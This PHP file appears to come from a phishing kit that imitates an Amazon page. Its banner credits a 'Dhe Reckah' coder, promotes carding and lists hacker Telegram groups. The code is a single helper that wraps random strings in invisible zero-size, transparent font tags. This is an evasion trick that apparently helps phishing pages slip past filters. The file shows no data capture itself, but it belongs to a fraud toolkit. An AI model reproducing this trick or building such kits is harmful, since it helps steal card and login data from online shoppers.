<?php
//error_reporting(E_ALL ^ E_NOTICE);
/*
██████╗ ██╗  ██╗███████╗    ██████╗ ███████╗ ██████╗██╗  ██╗ █████╗ ██╗  ██╗     ██████╗ ██████╗ ██████╗ ███████╗██████╗ 
██╔══██╗██║  ██║██╔════╝    ██╔══██╗██╔════╝██╔════╝██║ ██╔╝██╔══██╗██║  ██║    ██╔════╝██╔═══██╗██╔══██╗██╔════╝██╔══██╗
██║  ██║███████║█████╗      ██████╔╝█████╗  ██║     █████╔╝ ███████║███████║    ██║     ██║   ██║██║  ██║█████╗  ██║  ██║
██║  ██║██╔══██║██╔══╝      ██╔══██╗██╔══╝  ██║     ██╔═██╗ ██╔══██║██╔══██║    ██║     ██║   ██║██║  ██║██╔══╝  ██║  ██║
██████╔╝██║  ██║███████╗    ██║  ██║███████╗╚██████╗██║  ██╗██║  ██║██║  ██║    ╚██████╗╚██████╔╝██████╔╝███████╗██████╔╝
╚═════╝ ╚═╝  ╚═╝╚══════╝    ╚═╝  ╚═╝╚══════╝ ╚═════╝╚═╝  ╚═╝╚═╝  ╚═╝╚═╝  ╚═╝     ╚═════╝ ╚═════╝ ╚═════╝ ╚══════╝╚═════╝ 
 * (🧑‍💻)=>DHE RECKAH BOY BORN DEM<=(🧑‍💻)
 * (🧑‍💻)=>OR THEY DON'T TELL YOU <=(🧑‍💻)
 * (🧑‍💻)=>COMMON CARDING FOR DATOR<=(🧑‍💻)
 * Dhe Reckah Amazon Page (MultiFunc)
 * version 1.0.0
 * REMEMBER:                             
 * Facebook fan page is @DheReckahBoy
 * Twitter  fan page is @DheReckahBoy
 * Insta    fan page is @DheReckahBoy
 * youtube  fan page is @DheReckahBoy
 * Telegram fan page is @DheReckahBoy
 * Copycat all reserved @DheReckahBoys
#############################################
#$            Dhe Reckah Coded             #$
#$                  Says:                  #$ 
We All Know The Dangers Of The Internet Users
#$                    &                    #$
#$           As the Internet Exit          #$ 
#$           The dangers exit too          #$  
#############################################
 ================IF AGREED=================
 ==================THEN====================
=Contact Coder On Telegram @DheReckahCoded
=To Be save Join Our Telegram Group
=   @Dhe_ReckahsHackers_Generation
=To Be Secured Join Our Telegram Channel
=   @Dhe_Reckahs_Hackers_Generation

*/

function randoman($type, $lenght) {
    switch ($type) {
        case 'alphabet':
            $pstring = "abcdefghijklmnopqrstuvwxyz";
            $plen = strlen($pstring);
            for ($i = 1; $i <= $lenght; $i++) {
                $start = rand(0,$plen);
                $unik = substr($pstring, $start, 1).rand(11111,99999);
            }
            //return $unik;
            return "<font style='color:transparent;font-size:0px'>".$unik."</font>";
            break;
        case 'ALPHABET':
            $pstring = "ABCDEFGHIJKLMNOPQRSTUVWXYZ";
            $plen = strlen($pstring);
            for ($i = 1; $i <= $lenght; $i++) {
                $start = rand(0,$plen);
                $unik = substr($pstring, $start, 1).rand(11111,99999);
            }
            //return $unik;
            return "<font style='color:transparent;font-size:0px'>".$unik."</font>";
            break;
        case 'numeric':
            $pstring = "0123456789";
            $plen = strlen($pstring);
            for ($i = 1; $i <= $lenght; $i++) {
                $start = rand(0,$plen);
                $unik = substr($pstring, $start, 1).rand(11111,99999);
            }
            //return $unik;
            return "<font style='color:transparent;font-size:0px'>".$unik."</font>";
            break;
        case 'alphanumeric':
            $pstring = "abcdefghijklmnopqrstuvwxyz0123456789";
            $plen = strlen($pstring);
            for ($i = 1; $i <= $lenght; $i++) {
                $start = rand(0,$plen);
                $unik = substr($pstring, $start, 1).rand(11111,99999);
            }
            //return $unik;
            return "<font style='color:transparent;font-size:0px'>".$unik."</font>";
            break;
        case 'ALPHANUMERIC':
            $pstring = "ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789";
            $plen = strlen($pstring);
            for ($i = 1; $i <= $lenght; $i++) {
                $start = rand(0,$plen);
                $unik = substr($pstring, $start, 1).rand(11111,99999);
            }
            //return $unik;
            return "<font style='color:transparent;font-size:0px'>".$unik."</font>";
            break;
    }
}